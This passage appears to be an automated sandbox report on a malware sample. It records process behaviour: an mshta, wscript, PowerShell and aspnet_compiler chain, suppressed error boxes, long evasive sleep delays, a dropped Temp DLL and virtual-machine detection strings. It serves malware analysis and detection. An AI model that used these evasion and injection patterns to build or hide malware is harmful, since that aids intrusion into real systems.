                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4234Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5486Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6239Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3437Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1467Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 761Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3800Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6300Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep count: 6239 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5512Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep count: 3437 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep count: 1467 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep count: 761 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5688Thread sleep count: 3800 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1520Thread sleep count: 5985 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6760Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6556Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,11_2_00403D74
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60000Jump to behavior
                Source: powershell.exe, 00000009.00000002.2442666046.0000000009E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4']qemU
                Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000001.00000002.2204284614.00000000074CF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2204058634.0000000007413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000006.00000002.2149281361.0000000005920000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}|
                Source: powershell.exe, 00000001.00000002.2204058634.0000000007413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPMA
                Source: powershell.exe, 00000009.00000002.2321272794.000000000054C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                Source: aspnet_compiler.exe, 0000000B.00000002.3274760441.0000000001298000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: mshta.exe, 00000000.00000003.2041669450.0000000002F35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}r
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040317B mov eax, dword ptr fs:[00000030h]11_2_0040317B
